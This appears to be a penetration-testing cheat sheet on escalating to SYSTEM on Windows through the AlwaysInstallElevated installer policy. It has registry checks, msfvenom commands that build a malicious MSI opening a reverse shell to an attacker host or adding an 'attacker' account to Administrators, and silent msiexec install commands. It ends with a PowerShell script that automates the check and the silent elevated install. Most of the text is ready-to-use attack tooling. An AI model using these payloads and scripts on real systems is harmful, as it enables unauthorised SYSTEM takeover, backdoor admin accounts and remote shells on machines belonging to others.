- Windows Installer packages (`.msi` files) are used to install applications on the system. **They normally run with the privilege level of the user who starts them.**
- However, the `AlwaysInstallElevated` policy can be configured so that any user's installs run elevated: the Windows Installer service then executes the package as `NT AUTHORITY\SYSTEM`.
- This lets us build a malicious `.msi` whose custom action runs with SYSTEM privileges. The method requires two registry values, one under `HKLM` and one under `HKCU`, to both be set to `1`.
- If either value is missing or set to `0`, the policy is not in effect and this technique will not work. Querying a key or value that does not exist simply returns an error (`reg query`) or a red `Get-ItemProperty` error in PowerShell; that is the "not set" case.
- If both are set, generate a malicious `.msi` with `msfvenom` and install it with `msiexec`.

```cmd
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

```powershell
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
```

Payload generation (on the attacking host). The second payload assumes a local account named `attacker` already exists; it only adds that account to the local `Administrators` group.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o malicious.msi
msfvenom -p windows/exec CMD="net localgroup administrators attacker /add" -f msi -o evil.msi
```

Installation on the target. `/i` installs the package and `/qn` suppresses the UI (`/quiet` is equivalent to `/qn`, so one of the two is enough). `runas` prompts for the other user's password and installs the package from that user's context.

```cmd
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
runas /u:<user> "msiexec /quiet /qn /i C:\<PATH>\malicious.msi"
```
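The check-then-install sequence above, as an added PowerShell example that is not part of the original page. It reads both hives without throwing when a key or value is absent, treats the policy as exploitable only when both values equal `1`, and only then launches `msiexec`. The function names and the MSI path are assumptions of this example.

```powershell
# Added example (not from the original page). Function names and the sample
# MSI path are assumptions; the registry paths are the real policy locations.

function Get-AlwaysInstallElevatedValue {
    # Returns the DWORD value from one hive, or $null when the key/value is absent.
    param([Parameter(Mandatory)][ValidateSet('HKLM', 'HKCU')][string]$Hive)
    $path = "${Hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
    # -ErrorAction SilentlyContinue: a missing key or value yields nothing instead of an error.
    $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when BOTH the machine and the user value are 1.
    $hklm = Get-AlwaysInstallElevatedValue -Hive HKLM
    $hkcu = Get-AlwaysInstallElevatedValue -Hive HKCU
    [pscustomobject]@{
        HKLM        = if ($null -eq $hklm) { 'not set' } else { $hklm }
        HKCU        = if ($null -eq $hkcu) { 'not set' } else { $hkcu }
        Exploitable = ($hklm -eq 1 -and $hkcu -eq 1)
    }
}

function Invoke-ElevatedMsi {
    # Installs the package silently, but only if the policy check passes.
    param([Parameter(Mandatory)][string]$MsiPath)
    $state = Test-AlwaysInstallElevated
    $state | Format-List | Out-String | Write-Host
    if (-not $state.Exploitable) {
        Write-Warning 'AlwaysInstallElevated is not 1 in both hives; msiexec would run as the current user.'
        return $state
    }
    if (-not (Test-Path -LiteralPath $MsiPath)) {
        throw "MSI not found: $MsiPath"
    }
    # /i = install, /qn = no UI. With the policy set, the Windows Installer
    # service executes the package's custom action as SYSTEM.
    $proc = Start-Process -FilePath 'msiexec.exe' `
        -ArgumentList @('/i', "`"$MsiPath`"", '/qn') -Wait -PassThru
    # A msfvenom MSI typically reports an install failure after its custom action
    # has already fired, so judge success by the shell callback or the new group
    # member rather than by this exit code alone.
    Write-Host "msiexec exited with code $($proc.ExitCode)"
    return $state
}

# Usage (the path is an assumption of this example):
# Invoke-ElevatedMsi -MsiPath 'C:\Windows\Temp\malicious.msi'
```

`Test-AlwaysInstallElevated` on its own is also useful during enumeration, since it distinguishes "value absent" from "value 0" in its output, and `Exploitable` is false in both of those cases.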